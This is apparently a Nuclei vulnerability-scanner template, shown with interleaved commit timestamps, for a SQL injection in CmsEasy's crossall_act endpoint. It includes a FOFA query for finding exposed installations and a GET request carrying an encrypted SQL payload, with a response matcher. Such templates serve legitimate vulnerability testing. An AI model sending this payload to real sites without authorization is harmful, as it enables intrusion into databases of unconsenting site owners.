2023-09-08 11:25:00 +00:00
id : cmseasy-crossall-sqli
2023-08-18 03:22:06 +00:00
info :
2023-09-08 11:25:00 +00:00
name : CmsEasy crossall_act - SQL Injection
2023-08-18 03:22:06 +00:00
author : SleepingBag945
severity : high
description : |
2023-09-08 11:25:00 +00:00
CmsEasy crossall_act.php SQL Injection Vulnerability. CmsEasy has a SQL injection vulnerability. Any SQL command can be executed by encrypting the SQL statement in the file service.php.
reference :
- https://cn-sec.com/archives/1580677.html
- https://github.com/GREENHAT7/pxplan/blob/e2fc04893ca95e177021ddf61cc2134ecc120a8e/goby_pocs/CmsEasy_crossall_act.php_SQL_injection_vulnerability.json#L28
2023-08-18 03:22:06 +00:00
metadata :
2023-09-08 11:25:00 +00:00
verified : true
2023-10-14 11:27:55 +00:00
max-request : 1
2023-08-18 03:22:06 +00:00
fofa-query : app="CmsEasy"
2024-09-10 08:22:50 +00:00
product : cmseasy
vendor : cmseasy
2023-09-08 11:25:00 +00:00
tags : cmseasy,sqli
2023-08-18 03:22:06 +00:00
2024-09-10 08:22:50 +00:00
classification :
cpe : cpe:2.3:a:cmseasy:cmseasy:*:*:*:*:*:*:*:*
2023-08-18 03:22:06 +00:00
http :
2023-09-08 11:25:00 +00:00
- method : GET
path :
- "{{BaseURL}}/?case=crossall&act=execsql&sql=WY8gzSfZwW9R5YvyK"
2023-08-18 03:22:06 +00:00
matchers-condition : and
matchers :
- type : word
2023-09-08 11:25:00 +00:00
part : body
2023-08-18 03:22:06 +00:00
words :
- '{"123":"123"}'
- type : status
status :
2023-10-14 11:27:55 +00:00
- 200
2023-10-20 11:41:13 +00:00
# digest: 4a0a00473045022100929d88207cf831719af940ad7c2cd665c6083d14880dda52fe45a37b98f59569022033701fb59cda3f31a1f6aff6ff1e6e22d1ab3605b1dbcfeda80ebbc6a5c2bcd0:922c64590222798bb761d5b6d8e72950